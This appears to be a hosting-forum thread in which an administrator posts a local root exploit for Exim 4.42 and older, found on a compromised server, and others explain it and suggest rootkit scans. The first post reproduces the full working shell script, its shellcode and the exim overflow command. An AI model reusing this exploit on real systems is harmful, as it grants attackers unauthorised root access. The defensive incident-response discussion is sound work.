Results 1 to 9 of 9

Thread: Exim exploit

  1. #1
    Join Date
    Aug 2002
    Posts
    1,632

    Exim exploit

    Hi

    today i have found on my server this exim exploit what is the function of this script?


    #!/bin/sh

    ########### /str0ke
    # Ya I was a little late on this one.
    # Ref: http://www.milw0rm.com/id.php?id=756
    ########### /str0ke

    # Local Lame R00T sploit for exim <= 4.42
    # by Dark Eagle
    #
    # My First Coding Release In bash ))

    # Unl0ck Research Team
    #
    # More Effective than C-code.
    #
    # @env.c content:
    #
    ###################################################
    # #include <stdio.h>
    # #include <string.h>
    # int main(int argc, char *argv[])
    # {
    # char *addr_ptr;
    # addr_ptr = getenv(argv[1]);
    # printf("%s @ %p\n", argv[1], addr_ptr);
    # return 0;
    # }
    ###################################################

    gcc @env.c -o @env

    cp @env /usr/bin
    cd /usr/exim/bin

    CODE=`perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69
    \x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`;export CODE

    @env CODE
    echo "So, dude, starting..."
    echo "NoW Just Type Address Of CODE"

    read ADDRESS

    echo "You are typed: $ADDRESS"

    echo "Leeeeeeeeeeeeet'sssssssssss g000000000000000!!!!!!!!!"

    ./exim -bh ::%A`perl -e 'print pack('L','$ADDRESS') x 256'`

  2. #2
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    its goal is to gain local root by exploiting an olderversion of exim
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  3. #3
    Join Date
    Aug 2002
    Posts
    1,632
    ok i have 4.5 i have found also these fuiles in the site directory

    858 May 10 20:47 bd.pl
    313 May 10 20:45 bd.txt
    22389 Apr 27 18:12 bindz*
    15318 Jan 13 17:40 dtool2.php
    28402 May 10 20:56 elflbl*
    May 20 22:33 error_log
    1131 May 10 21:23 exim-xpl.sh*
    18831 May 10 20:57 expsta*
    2108 May 20 21:21 index.htm
    2523004 May 10 20:55 mremap*
    14080 May 10 20:59 yim*

  4. #4
    Join Date
    Jun 2003
    Posts
    961
    who does own the files?

  5. #5
    Join Date
    Aug 2002
    Posts
    1,632
    the owner is nobody

  6. #6
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    someone sure does want root on your server. several of those are root exploits. I would look at what script is being exploited and patch and/or remove it.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  7. #7
    Join Date
    May 2005
    Posts
    61
    I have seen some of them like elflbl* and yim. There are root hack processes. What about chkrootkit and rkhunter . Also check the open ports in your machine to check whether something is listening

  8. #8
    Join Date
    May 2005
    Posts
    61
    Also what kernel are you running. These kinds (yim and all) will not work in new kernels I think

  9. #9
    Join Date
    Aug 2002
    Posts
    1,632
    i use 2.6.11.10

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •